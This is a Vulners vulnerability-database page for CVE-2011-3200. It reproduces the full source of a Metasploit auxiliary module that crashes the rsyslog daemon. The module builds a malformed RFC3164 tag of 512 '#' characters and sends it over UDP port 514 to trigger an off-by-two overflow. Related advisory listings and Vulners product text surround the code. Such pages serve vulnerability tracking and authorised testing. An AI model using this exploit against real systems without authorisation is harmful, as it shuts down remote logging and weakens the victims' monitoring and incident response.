Lucene search
K

rsyslog Long Tag Off-By-Two DoS

🗓️ 02 Sep 2011 15:55:54Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 51 Views

rsyslog Long Tag Off-By-Two DoS. triggers off-by-two overflow in rsyslog daemon. Unlikely to yield code execution but shuts down remote log daemon. Introduced in v4.6.0, corrected in v4.6.8/5.8.

Related
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the Red Hat Enterprise Linux operating system, which allows a remote attacker to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
The vulnerability of the Red Hat Enterprise Linux operating system, which allows a remote attacker to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
The vulnerability of the Red Hat Enterprise Linux operating system, which allows a remote attacker to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
The vulnerability of the Red Hat Enterprise Linux operating system, which allows a remote attacker to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
The vulnerability of the Red Hat Enterprise Linux operating system, which allows a remote attacker to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
The vulnerability of the Red Hat Enterprise Linux operating system, which allows a remote attacker to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
The vulnerability of the Red Hat Enterprise Linux operating system, which allows a remote attacker to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
Circl
CVE-2011-3200
29 May 201815:50
circl
CVE
CVE-2011-3200
6 Sep 201116:00
cve
Cvelist
CVE-2011-3200
6 Sep 201116:00
cvelist
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize
    super(
      'Name'        => 'rsyslog Long Tag Off-By-Two DoS',
      'Description' => %q{
          This module triggers an off-by-two overflow in the
        rsyslog daemon. This flaw is unlikely to yield code execution
        but is effective at shutting down a remote log daemon. This bug
        was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.
        Compiler differences may prevent this bug from causing any
        noticeable result on many systems (RHEL6 is affected).
      },
      'Author'      => 'hdm',
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2011-3200'],
          [ 'URL', 'https://www.rsyslog.com/potential-dos-with-malformed-tag/' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=727644' ],
        ],
      'DisclosureDate' => 'Sep 01 2011')

    register_options(
      [
        Opt::RPORT(514)
      ])
  end

  def run
    connect_udp
    pkt = "<174>" + ("#" * 512) + ":"
    print_status("Sending message containing a malformed RFC3164 tag to #{rhost}")
    udp_sock.put(pkt)
    disconnect_udp
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation